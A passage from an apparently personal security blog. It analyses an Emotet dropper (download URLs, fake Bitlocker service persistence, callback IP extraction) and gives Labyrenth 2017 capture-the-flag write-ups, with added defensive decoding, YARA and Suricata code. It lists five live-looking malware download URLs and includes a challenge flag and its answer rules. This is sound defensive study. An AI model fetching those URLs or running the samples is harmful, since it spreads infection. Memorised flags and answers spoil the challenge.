The downloads are saved in %TEMP% with a random name in range(65536) + .exe. Afterwards the script tries to run the downloaded file.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7AQ_CMcy0OucQ6KIgmH44q5nbtCj3jxN84a__oRxbFHatDRDExLTZHfRUV2or7OS9xXDPPEfkNvg3LbSkUfBEol4OEM7T1oS4rNvjcZ2VkH8gQ7fMdEncbKx-5LxXkYxdVCdca9JeQFYL/s1600/cleandedbase64decpowershell.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="224" data-original-width="1175" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7AQ_CMcy0OucQ6KIgmH44q5nbtCj3jxN84a__oRxbFHatDRDExLTZHfRUV2or7OS9xXDPPEfkNvg3LbSkUfBEol4OEM7T1oS4rNvjcZ2VkH8gQ7fMdEncbKx-5LxXkYxdVCdca9JeQFYL/s1600/cleandedbase64decpowershell.JPG" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">beautified powershell</td></tr>
</tbody></table>
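<div>
As an added example (not code from the original post or from the dropper), the following PowerShell reproduces the decoding step above in a reusable form: it decodes the UTF-16LE base64 payload the way the post does, strips the backtick obfuscation from ${PA`TH}-style variable names, and pulls the URL array out of the result. The encoded input is constructed inline from a placeholder script with .invalid hosts that only mimics the variable layout described above and contains no download logic.</div>

```powershell
# Added example, not from the original post: decode an -EncodedCommand
# payload the way the post does, undo ${PA`TH}-style backtick obfuscation
# and list the download URLs. The encoded input is constructed below from
# a placeholder script (hosts under .invalid) so the example runs offline.

function ConvertFrom-EncodedCommand {
    param([Parameter(Mandatory)][string]$Base64)
    # -EncodedCommand payloads are UTF-16LE ("Unicode"), not UTF-8.
    [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($Base64))
}

function Remove-BacktickObfuscation {
    param([Parameter(Mandatory)][string]$Script)
    # Inside ${...} a backtick before an ordinary letter is ignored by the
    # parser, so ${PA`TH} is the same variable as $PATH. Rewrite every
    # ${...} reference to its plain form to make the script readable.
    [regex]::Replace($Script, '\$\{([^}]+)\}', {
        param($m)
        '$' + ($m.Groups[1].Value -replace '`', '')
    })
}

function Get-ScriptUrls {
    param([Parameter(Mandatory)][string]$Script)
    # Every http(s) URL in the script, de-duplicated, in order of appearance.
    # The dropper keeps them in one delimited string, so stop at common
    # delimiter characters as well as at quotes and whitespace.
    [regex]::Matches($Script, '(?i)https?://[^\s''",@;|]+') |
        ForEach-Object { $_.Value } |
        Select-Object -Unique
}

# Constructed stand-in for the decoded dropper: only the variable layout
# described in the post (URL array, random %TEMP% name); no download code.
$DemoScript = @'
${PA`TH} = "http://dl-one.invalid/hpV/,http://dl-two.invalid/vVKb/,http://dl-three.invalid/CsGXp/".Split(",")
${OU`T} = $env:TEMP + "\" + (Get-Random -Maximum 65536) + ".exe"
'@
# Encode it the way a dropper hands it to powershell.exe -EncodedCommand.
$Encoded  = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($DemoScript))

$Decoded  = ConvertFrom-EncodedCommand -Base64 $Encoded
$Readable = Remove-BacktickObfuscation -Script $Decoded
$Urls     = Get-ScriptUrls -Script $Readable

'--- decoded and de-obfuscated script ---'
$Readable
'--- download URLs ---'
$Urls
```

For a real sample, replace $Encoded with the string after -EncodedCommand (the "JAB7AH..." value above) and only ever run the decoding functions, never the decoded script itself.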
<br />
On successful download we get an executable. The script contains 5 URLs, some of which are still working:<br />
<br />
<i>http://e-thesis.com/hpV/<br />http://jonjun.com/vVKbiCUJ/<br />http://cvif.org/CsGXp/<br />http://daze.com.hk/yaeRXq/<br />http://funkystudio.org/lEYJk/</i><br />
<br />
<br />
<h2>
Stage 3 - Final Payload</h2>
<br />
Running the executable, I found two possible scenarios: the executable copies itself either to %LOCALAPPDATA%\Microsoft\Windows or to %SYSTEMROOT%\SYSWOW64.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZ-lYJo_12UKZzR1UAVzIDVAO9F-aqJPF4Vi_R8G-EGDLGt7n1XAWRcBxihIhWHZCtvD87dE6DfK0P5dYi6xJwL_B85SE9AkuH4jqz8UH2IhENA5FsSPhuJK1zkRpr_9pqCEja5N3o7OPi/s1600/case1exe.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="625" data-original-width="738" height="542" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZ-lYJo_12UKZzR1UAVzIDVAO9F-aqJPF4Vi_R8G-EGDLGt7n1XAWRcBxihIhWHZCtvD87dE6DfK0P5dYi6xJwL_B85SE9AkuH4jqz8UH2IhENA5FsSPhuJK1zkRpr_9pqCEja5N3o7OPi/s640/case1exe.JPG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">running without admin rights</td></tr>
</tbody></table>
<br />
In the first case there seems to be no persistence, as the executable won't start again on reboot.<br />
In case 2 the executable creates a service named after the executable, which restarts it on reboot.<br />
I noticed that even though my account is an administrator, I have to explicitly start the program as administrator to observe case 2.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgf2Zw48jMYIN_b-LMgQS4MxR_qzZ0eSIA2EaUCuOqZw3wq8XQrSYuWwdIwjGk5n9QsY87TOypu2iUIVCevzmWm4HxoLhG5OaBF73pjyNhv27I31WrCHONfYFo_l7Fs9_wFDk5dIPicGt0s/s1600/case2exe.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="642" data-original-width="744" height="552" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgf2Zw48jMYIN_b-LMgQS4MxR_qzZ0eSIA2EaUCuOqZw3wq8XQrSYuWwdIwjGk5n9QsY87TOypu2iUIVCevzmWm4HxoLhG5OaBF73pjyNhv27I31WrCHONfYFo_l7Fs9_wFDk5dIPicGt0s/s640/case2exe.JPG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">running with administrator rights</td></tr>
</tbody></table>
The service is disguised as "Bitlocker Drive Encryption Service Hoster", with a description telling the user that disabling the service would prevent Bitlocker usage.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisEcg5dC1EUyNXnEN5G0jNZPAmlLsNhGnshCzMnbgxJLCP0iaLTFVrQNEAzoxaHwx28MM2_wvndvErmVPzEm_RfeuChwaS9qhpB0rdR9vgjSWSoFYKIXdqDCO8eFMn0Hk7_b4jtaQLB2gd/s1600/case2service.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="319" data-original-width="733" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisEcg5dC1EUyNXnEN5G0jNZPAmlLsNhGnshCzMnbgxJLCP0iaLTFVrQNEAzoxaHwx28MM2_wvndvErmVPzEm_RfeuChwaS9qhpB0rdR9vgjSWSoFYKIXdqDCO8eFMn0Hk7_b4jtaQLB2gd/s1600/case2service.JPG" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">service used for persistence</td></tr>
</tbody></table>
<br />
<br />
<h3>
Figuring out the malware family</h3>
Monitoring the network connections, I could see a request to an IP every 30 to 60 seconds. These callbacks to IP addresses, combined with the fact that the executable name seems to be based on existing software on the computer, immediately reminded me of the infostealer/banking trojan Emotet.<br />
<br />
Having a look at older analyses of Emotet v4 from earlier this year (<a href="https://blog.fortinet.com/2017/05/03/deep-analysis-of-new-emotet-variant-part-1">https://blog.fortinet.com/2017/05/03/deep-analysis-of-new-emotet-variant-part-1</a>), the samples show a similar pattern, even though the persistence mechanism is different.<br />
<br />
In short: the old version created a new process and injected its code into it. The second thread had a hidden window with a WindowProc handler that determined which function should be run; these calls were triggered using WM_TIMER messages. Running the executable and watching it in Process Explorer, I noticed a similar behavior: the process started a new process and the old process exited.<br />
<br />
As the behavior of the new executable is quite similar, I expected to find another WindowProc function somewhere. I tried my old method of extracting Emotet's C&C IP addresses: run the malware, dump the final stage, and then extract the addresses with IDA Pro or a short Python script. Emotet stores them as raw bytes (plain hex) and formats them using %u %u %u %u format strings.<br />
I tried the same approach here and noticed that the byte patterns of the callback IPs I had monitored were not present in the executable. So I decided to attach a debugger.<br />
<br />
<h3>
Extracting the callback IPs </h3>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpLYGOFcyAS_95YwcN26V6McrMNMGjXjCSum5q_nrM1Ix8O1BdRoHl41jwqlLICTaXsfEA9736fQRjoTfa9dqY8203ePALTTdmpPD5xRjD4stz3h6R7CKaVAQhdoq7d5XI-2pM2EomvvpC/s1600/debug1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="767" data-original-width="1408" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpLYGOFcyAS_95YwcN26V6McrMNMGjXjCSum5q_nrM1Ix8O1BdRoHl41jwqlLICTaXsfEA9736fQRjoTfa9dqY8203ePALTTdmpPD5xRjD4stz3h6R7CKaVAQhdoq7d5XI-2pM2EomvvpC/s1600/debug1.JPG" /></a></div>
<br />
<br />
<br />
<br />
Upon attaching a debugger, I noticed new threads being created every 30 seconds, in sync with the callbacks.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPJGE-GCnnflYFv7X83vljb5VCddBSzMVKM9iJlYJoRr35IMoIcfkG2MZoJWd-X2J2-hMbF3lqzag0deJikZucWV_-m09UPq5C-jdCn-SCSMxP52uj0aS5pc2r3MVQxlzSI2VAy4i3PWUX/s1600/callback.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="245" data-original-width="982" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPJGE-GCnnflYFv7X83vljb5VCddBSzMVKM9iJlYJoRr35IMoIcfkG2MZoJWd-X2J2-hMbF3lqzag0deJikZucWV_-m09UPq5C-jdCn-SCSMxP52uj0aS5pc2r3MVQxlzSI2VAy4i3PWUX/s1600/callback.JPG" /></a></div>
<br />
<br />
Having a look at the callbacks, one can see that WinHttpRequests are used. These rely on creating a new thread for each request.<br />
<br />
The next step is to set a breakpoint on kernel32.CreateThread and wait until it is hit. On the break, have a look at the stack: a callback address, which looks promising.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJPKtDC1yyeWc4jtp10fnvKKoALfvk-r6oA0_lQzq4tJy2itBiqW-vqDhtu7L-69eVzAfP2G3t1B6z82VGRMxfYVB_QxcDV7gzBmOqE1K6MiIQzmImRTaHy_zLHukNrqcPVhccCsVi0vIr/s1600/debug2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="214" data-original-width="561" height="244" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJPKtDC1yyeWc4jtp10fnvKKoALfvk-r6oA0_lQzq4tJy2itBiqW-vqDhtu7L-69eVzAfP2G3t1B6z82VGRMxfYVB_QxcDV7gzBmOqE1K6MiIQzmImRTaHy_zLHukNrqcPVhccCsVi0vIr/s640/debug2.JPG" width="640" /></a></div>
<br />
<br />
The call stack in x64 debug shows only return addresses inside DLLs, so I scroll further down the stack. The first address I find outside the DLLs points right after a call to HttpSendRequestW.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQM_vB2Q6_v2xZpa_4K7fyAnvULif6_2ROJYkpIpGHDR1ob0dXT2P16ZiQ9W15asfkvmCgktyD4AMINGQMIlKgvo9i-rfIt0CVmi8aq7aEzCTaMZI-BDsdvwMuP6UEKzjN8vMma9G7Y8a2/s1600/debug3.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="711" data-original-width="1330" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQM_vB2Q6_v2xZpa_4K7fyAnvULif6_2ROJYkpIpGHDR1ob0dXT2P16ZiQ9W15asfkvmCgktyD4AMINGQMIlKgvo9i-rfIt0CVmi8aq7aEzCTaMZI-BDsdvwMuP6UEKzjN8vMma9G7Y8a2/s1600/debug3.JPG" /></a></div>
<br />
<br />
The next and final step is to find the IP address structure in memory and extract all IPs.<br />
To do so, just run until the next return is hit and step out of the function. Right above it I noticed a printf call, which is used to convert the hex values to decimal.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEo7I-_rIm1WnkFV1pP2TCPn1JucAkkpGwD5vCE4t_0XAB24ymJ8u0doasVssj46sUxC4J8t7nqV1ADyFVDppd8PP3XTp2eRHqjeHEF-7lT4-ed-DnyEaMkfM4Cx-88yw0mm18iBWW3Cad/s1600/debug5.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="194" data-original-width="983" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEo7I-_rIm1WnkFV1pP2TCPn1JucAkkpGwD5vCE4t_0XAB24ymJ8u0doasVssj46sUxC4J8t7nqV1ADyFVDppd8PP3XTp2eRHqjeHEF-7lT4-ed-DnyEaMkfM4Cx-88yw0mm18iBWW3Cad/s1600/debug5.JPG" /></a></div>
<br />
Before the call to printf, notice the four movzx eax / push eax instructions. Following the base address 325B298 leads to the array of callback IPs.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgE2iZtZ-Z6mPhognxyQ3i7aEX6H5zI2s-4jU7eGaY2IJoKB5W4aZ6knzba3EBaCCPMFYVplLBgSGDQ9nzVzJKCFUgSqdzCDuFdNPoUiiVTXiYlrrpADbtO5DUYt1bD9ihg13JdsIWEki5D/s1600/debug6.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="94" data-original-width="847" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgE2iZtZ-Z6mPhognxyQ3i7aEX6H5zI2s-4jU7eGaY2IJoKB5W4aZ6knzba3EBaCCPMFYVplLBgSGDQ9nzVzJKCFUgSqdzCDuFdNPoUiiVTXiYlrrpADbtO5DUYt1bD9ihg13JdsIWEki5D/s1600/debug6.JPG" /></a></div>
<br />
Each callback consists of 4 bytes for the IP and 4 bytes for the port. Converting them back leads to the following IP addresses.<br />
<br />
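The conversion step described above, as an added example that is not code from the post: a Python script that walks a callback table of 4 address bytes plus 4 port bytes out of a memory dump and turns the result into Suricata alert rules for the network team. The dump, its base address and the table address are constructed, and the field byte order (address bytes in printed order, port as a little-endian DWORD) is an assumption rather than something taken from the sample.

```python
"""
Decode a table of callback entries: each entry is 4 bytes of IPv4 address
followed by 4 bytes of port.  Added example; the memory dump, the dump base
and the table address are constructed, and the field byte order (address
bytes in printed order, port as a little-endian DWORD) is an assumption.
"""
import struct

ENTRY_SIZE = 8          # 4 address bytes + 4 port bytes
MAX_ENTRIES = 64        # sanity bound so a wrong address cannot run away

# Constructed "memory dump": padding, the callback table, a zero terminator,
# then unrelated bytes.  Addresses are taken from documentation ranges.
DUMP_BASE = 0x03250000
TABLE_VA = 0x0325B298
_TABLE = b"".join(
    struct.pack("<4BI", a, b, c, d, port)
    for (a, b, c, d, port) in [(10, 0, 0, 1, 443),
                               (192, 0, 2, 7, 8080),
                               (203, 0, 113, 5, 7080)])
SAMPLE_DUMP = (b"\x00" * (TABLE_VA - DUMP_BASE)) + _TABLE + b"\x00" * 8 + b"\xcc" * 16


def decode_callbacks(dump, dump_base, table_va, max_entries=MAX_ENTRIES):
    """Walk the entry table at table_va and return ['a.b.c.d:port', ...].

    Stops at the first all-zero address (terminator) or at a port field that
    is not a valid TCP port, which means the table has been overrun.
    """
    off = table_va - dump_base
    if off < 0 or off + ENTRY_SIZE > len(dump):
        raise ValueError("table address outside the dump")
    out = []
    for _ in range(max_entries):
        if off + ENTRY_SIZE > len(dump):
            break
        # The four movzx/push before the printf call correspond to these
        # four unsigned bytes; the port is the DWORD that follows them.
        a, b, c, d, port = struct.unpack_from("<4BI", dump, off)
        if (a, b, c, d) == (0, 0, 0, 0):
            break
        if not 0 < port <= 0xFFFF:
            break
        out.append("%u.%u.%u.%u:%u" % (a, b, c, d, port))
        off += ENTRY_SIZE
    return out


def suricata_rules(callbacks, sid_start, msg="Emotet callback"):
    """Turn the decoded list into Suricata/Snort alert rules, one per entry,
    so outbound connections to the callback hosts are flagged."""
    rules = []
    for i, entry in enumerate(callbacks):
        ip, port = entry.rsplit(":", 1)
        rules.append('alert tcp $HOME_NET any -> %s %s (msg:"%s %s"; '
                     'flow:to_server; sid:%d; rev:1;)'
                     % (ip, port, msg, entry, sid_start + i))
    return rules


if __name__ == "__main__":
    cbs = decode_callbacks(SAMPLE_DUMP, DUMP_BASE, TABLE_VA)
    print("\n".join(cbs))
    print("\n".join(suricata_rules(cbs, 1000001)))
```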
<br />Mr. Jones, 2017-07-24: Palo Alto Labyrenth Threat 05 Writeup<h2>
Labyrenth 2017 Threat 05</h2>
For the final challenge of the threat track we are confronted with almost the same task as in threat 2. The difference this time is that we have a set of 36 files and have to find 2 rules that together match all files: one should match 34, the other the remaining 2 files. The worst part about this challenge was a typo by the challenge author, which I'm certain sent many people on a wild goose chase.<br />
<br />
<blockquote class="tr_bq">
Hints:<br />
There are 6 wildcard "?"'s within one rule.<br />
There are 158 wildcard "?"'s within the other rule.<br />
<br />
There will be samples that have both anchor functions.<br />
<br />
One anchor function must cover 34 of the 36 samples <br />
The other must cover 12 of the 36 samples.</blockquote>
I used the same tools/commands I mentioned in my post about threat 2, so I won't repeat them here.<br />
I started by bindiffing the smallest (<i>4df98c74bdda906fb96368cc8720e3396b9a942c2eba253f068354fb466e4f93</i>) with the largest (<i>e57b24d962c8a90eb5ab98d9594d7ea077609227565beebef04c2af3cb111df5</i>) file, hoping that both belong to the 34/36 set. I sorted the output by similarity and function name. On the second sub_function I got lucky and got a match for 34/36 files.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjW6LJYJX5MKKgADhOmaSnqsL5QMUNyhYXYsHcbJee2KTIsV9APF8bTtPlJLoOL5eeYsdletmHE8pxeRSMVMh_SV2ljN45lzBX2NMHQahARhaXnQydXYZT96n-eeMKbTti9yotwoI5kcKMK/s1600/threat5-1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="244" data-original-width="1510" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjW6LJYJX5MKKgADhOmaSnqsL5QMUNyhYXYsHcbJee2KTIsV9APF8bTtPlJLoOL5eeYsdletmHE8pxeRSMVMh_SV2ljN45lzBX2NMHQahARhaXnQydXYZT96n-eeMKbTti9yotwoI5kcKMK/s1600/threat5-1.JPG" /></a></div>
I used the following command, followed by the yara.py from threat 2,<br />
<blockquote class="tr_bq">
for i in *; do xxd -p "$i" | tr -d '\n' | grep -o '8bff558bec83ec14535657e8.*' >> ~/hex_values.txt; done</blockquote>
to get the first rule<br />
<blockquote class="tr_bq">
<span style="font-size: x-small;">8bff558bec83ec14535657e8????ffff8365fc00833d??????00008bd80f858e00000068????4?00ff15??????008bf885ff0f842a0100008b35??????0068????4?0057ffd685c00f841401000050e8????ffffc70424????4?0057a3??????00ffd650e8????ffffc70424????4?0057a3??????00ffd650e8????ffffc70424????4?0057a3??????00ffd650e8????ffff59a3??????0085c0741468????4?0057ffd650e8????ffff59a3??????00a1??????003bc3744f391d??????00744750e8????ffffff35??????008bf0e8????ffff59598bf885f6742c85ff7428ffd685c074198d4df8516a0c8d4dec516a0150ffd785c07406f645f4017509814d1000002000eb39a1??????003bc3743050e8????ffff5985c07425ffd08945fc85c0741ca1??????003bc3741350e8????ffff5985c07408ff75fcffd08945fcff35??????00e8????ffff5985c07410ff7510ff750cff7508ff75fcffd0eb0233c05f5e5bc9c3</span></blockquote>
Again, this matches the complete function.<br />
<br />
For the second rule I immediately started comparing the remaining 2 files. I first bindiffed the smaller (<i>a81057e06bddc2bfdcd0bae8f3ed101a47e926f3d37a7f0f0378a89049725dc7</i>) one with the larger (<i>8b92700bac3150d3456697b64e63d21f8ca4447df57d02c7f90125c3068985d7</i>) and tried every sub_function without success. I noticed that many of the files have functions in the data section, so I bindiffed the larger of the two files against the smaller one. I found a function which was an unnamed sub_function in the larger file but labeled as _fread_nolock_s in the other, and to my surprise it worked.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvv9kJeMfGOC2WQtTeXl111nG4yTgYsN6BQEPytVY-fOzx0CWCr-aJQhyhsVfjmFm5stlBXD0UcccDhzOmknGHZBA1pbp_7XC7vlAI_EC3OpaTlz_YbdT77vBkLy7M-7atrKhp5Xo5ZNcf/s1600/threat5-2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="170" data-original-width="1512" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvv9kJeMfGOC2WQtTeXl111nG4yTgYsN6BQEPytVY-fOzx0CWCr-aJQhyhsVfjmFm5stlBXD0UcccDhzOmknGHZBA1pbp_7XC7vlAI_EC3OpaTlz_YbdT77vBkLy7M-7atrKhp5Xo5ZNcf/s1600/threat5-2.JPG" /></a></div>
<br />
<br />
For the second rule I used<br />
<blockquote class="tr_bq">
for i in *; do xxd -p "$i" | tr -d '\n' | grep -o '7807c745f001000000.*' >> ~/hex_values.txt; done</blockquote>
which matches 4 out of 36 files, so I guess the author of the challenge made a mistake and the hint was meant to be<br />
<blockquote class="tr_bq">
The other must cover 2(4???) of the 36 samples.</blockquote>
<br />
to get the second rule<br />
<blockquote class="tr_bq">
<span style="font-size: x-small;">7807c745f001000000a8407412814df000000004814df400000100834dec04a9001000007403097df0a8207409814df000000008eb0ba8107407814df000000010e8????000083cbff89063bc37521e8??</span></blockquote>
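Both rules above come out of the same procedure: the xxd/grep pipeline writes one hex line per file starting at the anchor function, and the yara.py from threat 2 turns those lines into a wildcard pattern. As an added example (my own code, not the yara.py from the threat 2 post), the following Python script does that core step: it keeps the nibbles that agree across all samples, wildcards the ones that differ, cuts the pattern at the function epilogue, counts the wildcards so the result can be checked against the hints (6 and 158), and counts how many samples the pattern covers. The three sample hex strings are constructed, not taken from the challenge files.

```python
"""
Build a wildcard hex rule from the same function extracted out of several
samples.  Added example; the sample hex strings below are constructed and
stand for the output of the xxd/grep pipeline (one line per file, each
starting at the function's first bytes).
"""
import re

ANCHOR = "8bff558bec83ec14535657e8"   # mov edi,edi / push ebp / ... / call
# Constructed samples: same function, different call targets and addresses,
# followed by whatever padding the compiler left after the ret.
SAMPLES = [
    ANCHOR + "a1fbffff" + "8365fc00" + "833d" + "112140" + "0000" + "5f5e5bc9c3" + "cccccc",
    ANCHOR + "b4fbffff" + "8365fc00" + "833d" + "324241" + "0000" + "5f5e5bc9c3" + "909090",
    ANCHOR + "c7fbffff" + "8365fc00" + "833d" + "533342" + "0000" + "5f5e5bc9c3" + "cccc",
]
UNRELATED = "4d5a90000300000004000000ffff0000b800000000000000"   # start of a PE header


def common_pattern(hex_strings):
    """Return a YARA hex pattern covering every input up to the shortest one.

    Nibbles that agree across all inputs are kept, nibbles that differ become
    '?', so a relocated address can yield '4?' (same high nibble) as well as
    '??' (fully wildcarded), as in the rules above.
    """
    if not hex_strings:
        raise ValueError("no input")
    hex_strings = [s.lower() for s in hex_strings]
    n = min(len(s) for s in hex_strings) // 2      # whole bytes only
    out = []
    for i in range(n):
        hi = {s[2 * i] for s in hex_strings}
        lo = {s[2 * i + 1] for s in hex_strings}
        out.append((hi.pop() if len(hi) == 1 else "?") +
                   (lo.pop() if len(lo) == 1 else "?"))
    return "".join(out)


def cut_at_function_end(pattern, epilogue="c9c3"):
    """Truncate after the first byte-aligned epilogue (default leave; ret) so
    the rule covers exactly one function and not whatever follows it."""
    for i in range(0, len(pattern) - len(epilogue) + 1, 2):
        if pattern[i:i + len(epilogue)] == epilogue:
            return pattern[:i + len(epilogue)]
    return pattern


def pattern_matches(pattern, sample_hex):
    """True if the pattern occurs at a byte boundary of the sample's hex dump."""
    body = "".join("[0-9a-f]" if c == "?" else c for c in pattern)
    rx = re.compile("(?=" + body + ")")           # zero-width: overlapping hits
    return any(m.start() % 2 == 0 for m in rx.finditer(sample_hex.lower()))


def coverage(pattern, samples):
    """How many of the samples the pattern matches (the '34 of 36' check)."""
    return sum(1 for s in samples if pattern_matches(pattern, s))


def to_yara_rule(name, patterns, condition="1 of them"):
    """Render the patterns as a YARA rule in the shape submitted above."""
    lines = ["rule %s" % name, "{", "    strings:"]
    for i, p in enumerate(patterns, 1):
        lines.append("        $%s%02d = { %s }" % (name, i, p))
    lines += ["    condition:", "        " + condition, "}"]
    return "\n".join(lines)


if __name__ == "__main__":
    pat = cut_at_function_end(common_pattern(SAMPLES))
    print("wildcards:", pat.count("?"))            # compare with the hint
    print("coverage:", coverage(pat, SAMPLES + [UNRELATED]), "of", len(SAMPLES) + 1)
    print(to_yara_rule("yara_challenge", [pat]))
```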
Submitting our rule with netcat, we get the final flag for the threat track<br />
<blockquote class="tr_bq">
rule yara_challenge<br />
{<br />
strings:<br />
$yara_challenge01 = { <span style="font-size: x-small;">8bff558bec83ec14535657e8????ffff8365fc00833d??????00008bd80f858e00000068????4?00ff15??????008bf885ff0f842a0100008b35??????0068????4?0057ffd685c00f841401000050e8????ffffc70424????4?0057a3??????00ffd650e8????ffffc70424????4?0057a3??????00ffd650e8????ffffc70424????4?0057a3??????00ffd650e8????ffff59a3??????0085c0741468????4?0057ffd650e8????ffff59a3??????00a1??????003bc3744f391d??????00744750e8????ffffff35??????008bf0e8????ffff59598bf885f6742c85ff7428ffd685c074198d4df8516a0c8d4dec516a0150ffd785c07406f645f4017509814d1000002000eb39a1??????003bc3743050e8????ffff5985c07425ffd08945fc85c0741ca1??????003bc3741350e8????ffff5985c07408ff75fcffd08945fcff35??????00e8????ffff5985c07410ff7510ff750cff7508ff75fcffd0eb0233c05f5e5bc9c3 </span>}<br />
$yara_challenge02 = { <span style="font-size: x-small;">7807c745f001000000a8407412814df000000004814df400000100834dec04a9001000007403097df0a8207409814df000000008eb0ba8107407814df000000010e8????000083cbff89063bc37521e8??</span> }<br />
condition:<br />
1 of them <br />
}</blockquote>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgv40WPpTjT7xvBsxtJGpMHfEDa36lyVtFyNae663z5aSmgjgvgfFN0oAYfr93NMUhZ30Z-nPhminhSvJ6Sk0ix0qeXmK_5-B7Wjs3VipOgeH1YH3sAtxQfaPe_wFgO-UQMMBD8__6f6KrN/s1600/threat5-final.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="324" data-original-width="719" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgv40WPpTjT7xvBsxtJGpMHfEDa36lyVtFyNae663z5aSmgjgvgfFN0oAYfr93NMUhZ30Z-nPhminhSvJ6Sk0ix0qeXmK_5-B7Wjs3VipOgeH1YH3sAtxQfaPe_wFgO-UQMMBD8__6f6KrN/s1600/threat5-final.JPG" /></a></div>
<br />
<blockquote class="tr_bq">
<b>PAN{Pivot!Pivot!Pivot!Pivot!Pivot!Pivot!ShutUp!ShutUp!ShutUp!}</b></blockquote>
Mr. Jones, 2017-07-24: Palo Alto Labyrenth Threat 04 Writeup<h2>
<b>Labyrenth 2017 Threat 04</b></h2>
<h4>
Part 1</h4>
We are presented with a document; upon opening the file we see a warning<br /><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZd79k6HJ78UEoFcQ6iwKJU2pSBGio7Yz9c1wkS780ZW6WatvBhQrR9XVutqw_uUBrjR_V5vhqbonOKJ9fURetZVunRX7_BXZWTToo0ZsdIITQx021t2IWIn8kD8OYhbKfl8THj71Y2Gpp/s1600/threat4-1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="646" data-original-width="813" height="317" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZd79k6HJ78UEoFcQ6iwKJU2pSBGio7Yz9c1wkS780ZW6WatvBhQrR9XVutqw_uUBrjR_V5vhqbonOKJ9fURetZVunRX7_BXZWTToo0ZsdIITQx021t2IWIn8kD8OYhbKfl8THj71Y2Gpp/s400/threat4-1.JPG" width="400" /></a></div>
So let's activate the macros and see what happens.<br /><br /><br />
<div class="separator" style="clear: both; text-align: center;">
